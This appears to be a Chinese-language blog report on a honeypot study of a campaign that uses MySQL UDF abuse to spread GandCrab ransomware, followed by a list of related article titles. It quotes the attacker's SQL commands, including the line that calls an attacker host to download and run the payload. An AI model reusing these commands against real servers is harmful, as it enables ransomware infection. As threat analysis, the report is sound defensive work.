研究人员在实验室环境中搭建了一个蜜罐系统,监听着 SQL 服务器使用的默认端口(TCP/3306 端口)。该蜜罐系统发现来自美国机器的攻击。研究人员监控了僵尸网络生成的网络流量和行为,发现该 Linux 蜜罐下载了一个 Windows 可执行文件。

攻击者首先用 SQL 数据库命令在上传 helper DLL 到服务器,然后作为数据库函数调用该 DLL 来提取 IP 地址位于加拿大魁北克省的主机上的 GandCrab payload。

数据库服务器下载 GandCrab

SQL 攻击

攻击的第一阶段是攻击者连接到数据库服务器,然后确定他运行的是 MySQL。因为蜜罐系统模拟了 MySQL,因此攻击的后面部分就非常顺利。

攻击者释放的 SQL 命令

然后,攻击者使用 set 命令来上传所有的字节,这些字节组成了 helper DLL,这些字节是长字符串格式的十六进制字符,在内存中会作为变量。

helper DLL 作为输出进入数据库,就像真的长记录一样

然后攻击者将变量的内容写入创建的数据库表 yongger2 中。

然后攻击者发布命令给服务器将这些字节拼接成一个文件,然后释放到服务器的插件目录中。研究人员还发现许多用于交换斜杠和反斜杠字符的命令,目的是绕过安全特征。

Helper DLL 的内部功能

DLL 看似会向数据库增加 3 个函数,分别是 xpdl3, xpdl3_deinit, xpdl3_init。DLL 只是许多恶意工具箱的一个组件,之前就被上传到 VirusTotal 这样的平台上。

helper DLL 包含在许多含有恶意工具集的文档中

攻击者会发布 SQL 命令来释放 yongger2 table,删除通过服务器的文件轨迹记录,释放函数 xpdl3。最后,使用下面的 SQL 命令来创建新的数据库函数 xpdl3 来调用该 DLL:

CREATE FUNCTION xpdl3 RETURNS STRING SONAME ’ cna12.dll ’

将 helper DLL 传到数据库服务器的插件目录并初始化后,攻击者就会发布 SQL 命令道服务器中,调用新添加的 xpdl3 函数:

select xpdl3 ( ’ hxxp://172.96.14.134:5471/3306-1 [ . ] exe ’ , ’ c:\isetup.exe ’ )

Wireshark 中发现的网络事件序列

如果一切正常,数据库服务器就会从远程机器下载 GandCrab payload,并释放到 C 盘根目录,命名为 isetup.exe 并执行。

这种攻击很流行

针对数据库服务器的攻击并不少见,而且这个趋势未来可能会继续。就在 5 月 19 日这个攻击就发生在真实的 MySQL 服务器上,机器应该已经被加密。

开放目录使用 HFS,含有中文用户接口

但是文件所在的 URL 指向的是位于 web 服务器的开放目录,web 服务器运行的是 HFS 服务器软件,这是一个基于 Windows 的 web 服务器。

但保存 GandCrab 样本的机器的 IP 地址的位置为美国的亚利桑那州,但机器安装的 HFS 用户接口是简体中文。而且显示有人多次下载了服务器上的文件。

开放目录显示有 5 个以 3306 开头的 Windows 可执行文件,之后是连字符 -,实际上是同一文件的多个重命名版本。只有 3306.exe 文件与其余的不同。目录中还含有名为 RDP 的恶意 Linux ELF 可执行文件,但是本次攻击活动中没有使用。

RDP 文件是相关的 DDOS Linux 木马的样本之一

服务器显示样本 3306-1.exe 的下载量超过 500 次。所有样本加起来 5 天下载了接近 800,开放目录中的 GandCrab 样本下载量超过 2300 次。

虽然目前还没有大规模攻击和广泛传播,但是确实对 MySQL 服务器管理员带来了巨大的威胁,因为 3306 端口会成为攻击者的一个跳板。

linux cna12.dll,攻击 MySQL 服务器传播 GandCrab 勒索软件相关推荐

  1. 别再回来了!GandCrab勒索软件最终版本解密工具降世

    6月17日,对于最丰富的勒索家族GandCrab的最新版本的新解密工具已经免费发布在www.nomoreransom.org (一个收集最全的勒索软件解密工具的网站) https://www.nomo ...

  2. 比特梵德再次发布GandCrab勒索软件免费解密工具

    对于GandCrab勒索软件的受害者来说,这应该是一个好消息.罗马尼亚反病毒软件公司比特梵德(Bitdefender)已经与欧洲刑警组织.美国联邦调查局.罗马尼亚警方以及其他国家(保加利亚.法国.匈牙 ...

  3. 发票 发票 Necurs僵尸网络也开假发票 实则传播Locky勒索软件

    思科Talos安全研究人员称,Necurs垃圾邮件僵尸网络通过发送伪装成虚假发票的信息传播 Locky勒索软件 .去年,Locky跻身为勒索软件前列,幕后主推手为Necurs僵尸网络,两者活动密切相关 ...

  4. mysql系统错误 111,无法连接到MySQL服务器错误111

    无法连接到MySQL服务器错误111 我在Linux上安装了mysql服务器IP = 192.168.1.100,但是当我尝试连接到这个IP它总是错误(111). 但使用本地主机和127.0.0.1是 ...

  5. 供应链勒索攻击登场,REvil 利用0day 迫使安全事件响应工具 VSA部署勒索软件

     聚焦源代码安全,网罗国内外最新资讯! 编译:奇安信代码卫士 专栏·供应链安全 数字化时代,软件无处不在.软件如同社会中的"虚拟人",已经成为支撑社会正常运转的最基本元素之一,软件 ...

  6. 黑客利用Apache Struts 2漏洞在服务器上传递Cerberus勒索软件

    前一阵,我们对Apache Strust 2的CVE-2017-5638漏洞进行了预警,最近F5实验室的研究人员发现Apache Struts 2 漏洞被网络罪犯用于传递Cerber勒索软件. 实际上 ...

  7. 解读全球最严重的5起勒索软件攻击

    本文讲的是解读全球最严重的5起勒索软件攻击, 在最近几年间,说起令人厌烦的软件攻击类型,勒索软件已经成为不容忽视的一种存在了. 所谓勒索软件其实就是一种恶意软件,可以感染设备.网络与数据中心并使其瘫痪 ...

  8. 新型攻击接踵而来 思科Talos解析Jaff勒索软件

    思科Talos持续监控电子邮件威胁环境,紧密跟踪出现的新威胁和现有威胁的变化.我们最近观察到几次大规模的电子邮件攻击活动,它们试图传播一种名为"Jaff"的全新勒索软件变种.有意思 ...

  9. 攻击者利用Python 勒索软件加密 VMware ESXi 服务器

     聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 Sophos 报道称,最近发现攻击活动利用基于 Python 的勒索软件变体攻击组织机构的 VMware ESXi 服务器并加密所有的虚拟磁盘. ...

最新文章

  1. 深度玩转神经网络——基于Keras
  2. docker 查看容器ip
  3. 【20170926】【软工】第1次个人作业
  4. 数据结构源码笔记(C语言):二叉平衡树的相关操作算法
  5. 正则化与L0、L1、L2范数略解
  6. [NOTE] sqli-labs Basic Challenges
  7. Excel多条件求和 SUMPRODUCT函数用法详解
  8. python from sys import argv_笨方法学python之import sys与from sys import argv的区别
  9. 【ThinkingInC++】66、pointer Stash的使用
  10. 14个非常棒的 JavaScript 游戏开发框架推荐
  11. linux下配置环境变量方式
  12. linux redis-trib.rb,redis集群配置 执行 redis-trib.rb 报错解决方法
  13. 解决学校邮箱屏蔽邮件的问题/收不到邮件
  14. MySQL的基本学习(三)——DD/M/QL三类SQL语言和SQLyog
  15. DSB matlab仿真
  16. 学python后的感想_学习python的感想
  17. CCT Camera Tuning
  18. 股票自选股基本函数大全-6
  19. SEO人员,怎么先发制人做好SEO?
  20. 飞利浦dicom_如何在飞利浦色相系统中添加第三方智能灯泡

热门文章

  1. 数据库之MySQL补充
  2. JavaScript获取图片的原始尺寸
  3. NFS服务自动搭建及挂载脚本
  4. Java基础系列--instanceof关键字
  5. jqxWidgets 常用代码
  6. Linux 下挂载新硬盘方法(转)
  7. 第二章 函数式数据结构
  8. 阅读《平庸的世界》后感觉 (两)
  9. Android CardView的基本使用
  10. Mr.J--HTTP学习笔记(二)-- URL详解